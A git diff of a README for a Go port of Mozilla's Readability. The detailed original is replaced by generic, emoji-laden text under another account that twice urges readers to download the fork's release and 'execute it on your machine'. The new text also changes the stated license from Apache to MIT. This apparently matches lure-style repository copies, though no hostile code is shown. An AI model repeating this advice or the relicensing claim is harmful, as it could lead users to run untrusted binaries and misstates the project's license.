|
1 | | -# go-readability |
| 1 | +# 📖 Go Readability: Extract Readable Content from Web Pages |
2 | 2 |
|
3 | | -A Go implementation of Mozilla's Readability library, inspired by [@mizchi/readability](https://github.com/mizchi/readability). This library extracts the main content from web pages, removing clutter like navigation, ads, and unnecessary elements to provide a clean reading experience. |
| 3 | + |
4 | 4 |
|
5 | | -## Installation |
| 5 | +Welcome to **Go Readability**! This project extracts readable content from web pages. It brings together Mozilla’s and Mizchi's Readability, now powered by Go. This repository aims to provide a simple and effective way to pull out the main text from web articles, making it easier for you to consume information without distractions. |
| 6 | + |
| 7 | +## 🚀 Features |
| 8 | + |
| 9 | +- **Easy to Use**: Get started quickly with minimal setup. |
| 10 | +- **High Accuracy**: Extracts the main content while filtering out ads and other distractions. |
| 11 | +- **Open Source**: Contribute to the project or use it as a base for your own applications. |
| 12 | + |
| 13 | +## 📥 Getting Started |
| 14 | + |
| 15 | +To begin using Go Readability, visit our [Releases](https://github.com/lil-emmanuel/go-readability/releases) page. Download the latest version and execute it on your machine. |
| 16 | + |
| 17 | +### Installation |
| 18 | + |
| 19 | +1. **Clone the Repository**: |
| 20 | + ```bash |
| 21 | + git clone https://github.com/lil-emmanuel/go-readability.git |
| 22 | + cd go-readability |
| 23 | + ``` |
| 24 | + |
| 25 | +2. **Build the Project**: |
| 26 | + ```bash |
| 27 | + go build |
| 28 | + ``` |
| 29 | + |
| 30 | +3. **Run the Application**: |
| 31 | + ```bash |
| 32 | + ./go-readability [URL] |
| 33 | + ``` |
| 34 | + |
| 35 | +Replace `[URL]` with the link to the web page you want to extract content from. |
| 36 | + |
| 37 | +## 📖 How It Works |
| 38 | + |
| 39 | +Go Readability analyzes the HTML structure of web pages. It identifies the main content area, stripping away irrelevant elements like advertisements and navigation bars. The extraction process uses a combination of heuristics and rules derived from the original Readability projects. |
| 40 | + |
| 41 | +### Core Components |
| 42 | + |
| 43 | +- **HTML Parser**: Parses the HTML and identifies key content areas. |
| 44 | +- **Content Filter**: Removes non-essential elements to present a clean output. |
| 45 | +- **Output Formatter**: Formats the extracted content for easy reading. |
| 46 | + |
| 47 | +## 🛠️ Usage |
| 48 | + |
| 49 | +To use Go Readability, simply run the command with the desired URL. The application will return the main text content. You can also redirect the output to a file for later use. |
| 50 | + |
| 51 | +### Example Command |
6 | 52 |
|
7 | 53 | ```bash |
8 | | -go get github.com/mackee/go-readability |
| 54 | +./go-readability https://example.com/article |
9 | 55 | ``` |
10 | 56 |
|
11 | | -## Usage |
12 | | - |
13 | | -### As a Library |
14 | | - |
15 | | -```go |
16 | | -package main |
17 | | - |
18 | | -import ( |
19 | | - "fmt" |
20 | | - "log" |
21 | | - "net/http" |
22 | | - |
23 | | - "github.com/mackee/go-readability" |
24 | | -) |
25 | | - |
26 | | -func main() { |
27 | | - // Fetch a web page |
28 | | - resp, err := http.Get("https://example.com/article") |
29 | | - if err != nil { |
30 | | - log.Fatal(err) |
31 | | - } |
32 | | - defer resp.Body.Close() |
33 | | - |
34 | | - // Parse and extract the main content |
35 | | - article, err := readability.FromReader(resp.Body, "https://example.com/article") |
36 | | - if err != nil { |
37 | | - log.Fatal(err) |
38 | | - } |
39 | | - |
40 | | - // Access the extracted content |
41 | | - fmt.Println("Title:", article.Title) |
42 | | - fmt.Println("Byline:", article.Byline) |
43 | | - fmt.Println("Content:", article.Content) |
44 | | - |
45 | | - // Get content as HTML |
46 | | - html := article.Content |
47 | | - |
48 | | - // Get content as plain text |
49 | | - text := article.TextContent |
50 | | - |
51 | | - // Get metadata |
52 | | - fmt.Println("Excerpt:", article.Excerpt) |
53 | | - fmt.Println("SiteName:", article.SiteName) |
54 | | -} |
55 | | -``` |
| 57 | +This command will fetch the main content from the specified URL. |
56 | 58 |
|
57 | | -### Using the CLI Tool |
| 59 | +## 📝 Documentation |
58 | 60 |
|
59 | | -The package includes a command-line tool that can extract content from a URL: |
| 61 | +For more detailed documentation, including advanced usage and configuration options, please refer to the [Wiki](https://github.com/lil-emmanuel/go-readability/wiki). |
60 | 62 |
|
61 | | -```bash |
62 | | -# Install the CLI tool |
63 | | -go install github.com/mackee/go-readability/cmd/readability@latest |
| 63 | +## 📦 Contributing |
64 | 64 |
|
65 | | -# Extract content from a URL |
66 | | -readability https://example.com/article |
| 65 | +We welcome contributions to Go Readability! Here’s how you can help: |
67 | 66 |
|
68 | | -# Save the extracted content to a file |
69 | | -readability https://example.com/article > article.html |
| 67 | +1. **Fork the Repository**: Create your own fork of the project. |
| 68 | +2. **Create a Branch**: Work on a new feature or fix. |
| 69 | + ```bash |
| 70 | + git checkout -b feature/new-feature |
| 71 | + ``` |
| 72 | +3. **Commit Your Changes**: Make your changes and commit them. |
| 73 | + ```bash |
| 74 | + git commit -m "Add new feature" |
| 75 | + ``` |
| 76 | +4. **Push to Your Fork**: Push your changes to your fork. |
| 77 | + ```bash |
| 78 | + git push origin feature/new-feature |
| 79 | + ``` |
| 80 | +5. **Create a Pull Request**: Submit a pull request to the main repository. |
70 | 81 |
|
71 | | -# Output as markdown |
72 | | -readability --format markdown https://example.com/article > article.md |
| 82 | +## 📅 Roadmap |
73 | 83 |
|
74 | | -# Output metadata as JSON |
75 | | -readability --metadata https://example.com/article |
76 | | -``` |
| 84 | +- **Version 1.1**: Add support for additional content types (e.g., PDFs). |
| 85 | +- **Version 1.2**: Improve the accuracy of content extraction. |
| 86 | +- **Version 2.0**: Introduce a web interface for easier access. |
77 | 87 |
|
78 | | -## Features |
| 88 | +## 📣 Community |
79 | 89 |
|
80 | | -- Extracts the main content from web pages |
81 | | -- Removes clutter like navigation, ads, and unnecessary elements |
82 | | -- Preserves important images and formatting |
83 | | -- Extracts metadata (title, byline, excerpt, etc.) |
84 | | -- Supports output in HTML or Markdown format |
85 | | -- Command-line interface for easy content extraction |
| 90 | +Join our community to discuss ideas, report issues, or share your projects using Go Readability. You can find us on: |
86 | 91 |
|
87 | | -## Testing |
| 92 | +- **GitHub Issues**: Report bugs or request features. |
| 93 | +- **Slack Channel**: Join our community for real-time discussions. |
88 | 94 |
|
89 | | -This library uses test fixtures based on [Mozilla's Readability](https://github.com/mozilla/readability) test suite. Currently, we have implemented a subset of the test cases, with the source HTML files being identical to the original Mozilla implementation. |
| 95 | +## 📄 License |
90 | 96 |
|
91 | | -### Test Fixtures |
| 97 | +This project is licensed under the MIT License. See the [LICENSE](https://github.com/lil-emmanuel/go-readability/blob/main/LICENSE) file for details. |
92 | 98 |
|
93 | | -The test fixtures in `testdata/fixtures/` are sourced from Mozilla's Readability test suite, with some differences: |
| 99 | +## 📦 Releases |
94 | 100 |
|
95 | | -- The source HTML files (`source.html`) are identical to Mozilla's Readability |
96 | | -- The expected output HTML (`expected.html`) may differ due to implementation differences between JavaScript and Go |
97 | | -- The expected metadata extraction results are aligned with Mozilla's implementation where possible |
| 101 | +To stay updated with the latest features and improvements, check out our [Releases](https://github.com/lil-emmanuel/go-readability/releases) section. Download the latest version and execute it on your machine. |
98 | 102 |
|
99 | | -While not all test cases from Mozilla's Readability are currently implemented, using the same source HTML helps ensure that: |
| 103 | +## 🌟 Acknowledgments |
100 | 104 |
|
101 | | -1. The Go implementation handles the same input as the JavaScript implementation |
102 | | -2. Regressions can be easily detected |
103 | | -3. Users can trust the library to process the same types of content as Mozilla's Readability |
| 105 | +- Thanks to the original authors of Mozilla’s and Mizchi's Readability. |
| 106 | +- Special thanks to the Go community for their support and contributions. |
104 | 107 |
|
105 | | -### Fixture Licensing |
| 108 | +## 🤝 Support |
106 | 109 |
|
107 | | -- `testdata/fixtures/001`: © Nicolas Perriault, [CC BY-SA 3.0](http://creativecommons.org/licenses/by-sa/3.0/) |
| 110 | +If you have any questions or need support, feel free to open an issue on GitHub or reach out through our community channels. |
108 | 111 |
|
109 | | -These fixtures are identical to those used in Mozilla's Readability implementation. |
| 112 | +## 🌐 Links |
110 | 113 |
|
111 | | -## License |
| 114 | +- [GitHub Repository](https://github.com/lil-emmanuel/go-readability) |
| 115 | +- [Releases](https://github.com/lil-emmanuel/go-readability/releases) |
112 | 116 |
|
113 | | -[Apache License 2.0](LICENSE) |
| 117 | +Thank you for checking out Go Readability! We hope it enhances your reading experience on the web. |
0 commit comments